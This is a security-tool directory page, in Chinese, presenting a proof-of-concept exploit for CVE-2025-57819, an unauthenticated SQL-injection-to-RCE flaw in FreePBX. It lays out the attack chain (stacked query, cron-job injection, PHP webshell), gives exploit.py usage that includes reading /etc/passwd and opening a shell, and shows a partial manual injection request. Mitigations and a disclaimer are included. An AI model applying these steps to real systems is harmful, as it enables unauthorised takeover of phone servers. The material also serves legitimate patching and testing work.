Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-57819-POC — FreePBX 未认证SQL注入导致远程代码执行,FreePBX 15 (低于 15.0.66)、16 (低于 16.0.89)、17 (低于 17.0.3)。该漏洞位于商业化“endpoint”模块中,因对用户输入过滤不严,允许未认证的攻击者绕过管理员权限,执行SQL注入,并最终实现远程代码执行 | Kitploit
工具/GitHubGitHub/neobee714/cve-2025-57819-poc
漏洞扫描器代码分析漏洞利用Web安全学习与教育
GitHubneobee714/cve-2025-57819-poc

CVE-2025-57819-POC

FreePBX 未认证SQL注入导致远程代码执行,FreePBX 15 (低于 15.0.66)、16 (低于 16.0.89)、17 (低于 17.0.3)。该漏洞位于商业化“endpoint”模块中,因对用户输入过滤不严,允许未认证的攻击者绕过管理员权限,执行SQL注入,并最终实现远程代码执行

查看仓库
1个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-57819 — FreePBX SQL 注入 → RCE PoC

CVE-2025-57819 是 FreePBX 中的一个严重 SQL 注入漏洞,未认证的攻击者可通过将 SQL 注入与 cron 任务注入相结合来实现远程代码执行。

⚠️ 免责声明:本仓库仅用于授权安全测试和教育目的。未经授权对你不拥有或未获得明确测试许可的系统使用此漏洞利用程序属于违法行为。作者不对任何滥用或损害负责。


漏洞概述

字段详情
CVECVE-2025-57819
受影响产品FreePBX(认证前)
漏洞类型SQL 注入(堆叠查询)
影响远程代码执行 (RCE)
攻击向量网络 (HTTP GET)
是否需要认证❌ 无需认证

利用链

root@kitploit:~
┌────────────────────────────────────────────────────────────────┐
│ 1. SQL Injection                                               │
│    POST /admin/ajax.php?brand= → stacked query                 │
│    INSERT INTO cron_jobs …                                     │
├────────────────────────────────────────────────────────────────┤
│ 2. Cron Job Injection                                          │
│    Malicious cron job writes base64-decoded PHP webshell       │
│    to /var/www/html/shell.php                                  │
├────────────────────────────────────────────────────────────────┤
│ 3. WebShell Access                                             │
│    GET /shell.php?cmd=<command> → arbitrary code execution     │
└────────────────────────────────────────────────────────────────┘

工作原理

  1. /admin/ajax.php 端点处理 brand 参数时未进行适当的清理,从而允许堆叠 SQL 查询。
  2. 攻击者注入一条 INSERT INTO cron_jobs 语句,安排每分钟执行一次恶意命令。
  3. 该 cron 任务解码 base64 编码的 PHP webshell,并将其写入 Web 根目录。
  4. 写入完成后,攻击者即可通过 webshell 执行任意系统命令。

快速开始

root@kitploit:~
# Clone
git clone [email protected]:Neobee714/CVE-2025-57819-POC.git
cd CVE-2025-57819-POC

# Install dependency
pip install requests

# Basic usage
python exploit.py <target>

# Drop into interactive shell after injection
python exploit.py <target> --shell

# Execute a single command
python exploit.py <target> --cmd "cat /etc/passwd"

用法

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [--shell] [--cmd CMD]
                  [--param PARAM] [--no-wait] [-v]
                  target

CVE-2025-57819 – FreePBX SQLi → Cron → WebShell

positional arguments:
  target                target hostname or IP (with optional scheme)

options:
  -h, --help            show this help message and exit
  -p, --port PORT       port (default: 80/443)
  --shell               drop into interactive shell after injection
  --cmd CMD             execute a single command via the webshell
  --param PARAM         webshell query-string parameter (default: cmd)
  --no-wait             skip the webshell-verification poll
  -v, -vv               increase verbosity (-v info, -vv debug)

示例

root@kitploit:~
# Target with default HTTP port
python exploit.py connected.htb

# Target with custom port
python exploit.py 10.10.11.100 -p 8080

# Inject, verify, and drop into interactive shell
python exploit.py 10.10.11.100 --shell

# Inject and run a single command
python exploit.py connected.htb --cmd "whoami"

# Skip the verification poll (if you already know the shell is live)
python exploit.py connected.htb --no-wait --cmd "id"

# Verbose output for debugging
python exploit.py connected.htb -vv --shell

交互式 Shell

使用 --shell 时,脚本会进入一个伪终端:

root@kitploit:~
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
[*] Shell session ended.

输入 exit(或按 Ctrl-C、Ctrl-D)即可退出会话。


手动验证

如果你更倾向于手动操作,该利用程序会执行以下三项操作:

第 1 步 – 注入 cron 任务

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=x&model=model&brand=x'%20%3BINSERT%20INTO%20cron_jobs%20...

第 2 步 – 等待约 60 秒让 cron 触发

注入的 cron 任务(* * * * *)每分钟运行一次并写入 webshell。

第 3 步 – 访问 webshell

root@kitploit:~
GET /shell.php?cmd=id

清理

测试完毕后,删除 webshell 和 cron 任务条目:

root@kitploit:~
DELETE FROM cron_jobs WHERE command LIKE '%base64%';

然后从文件系统中删除 /var/www/html/shell.php。


受影响版本

  • 供应商补丁发布之前的 FreePBX 版本
  • 无需认证即可访问 /admin/ajax.php 的系统

缓解措施

  • 立即应用供应商提供的安全补丁
  • 限制对 FreePBX 管理界面的网络访问
  • 确保 FreePBX 数据库用户拥有最小权限(纵深防御)

参考

  • FreePBX 安全公告
  • OWASP SQL 注入

许可证

本项目仅用于教育和防御性安全研究目的。请参阅本文档顶部的免责声明。

下载工具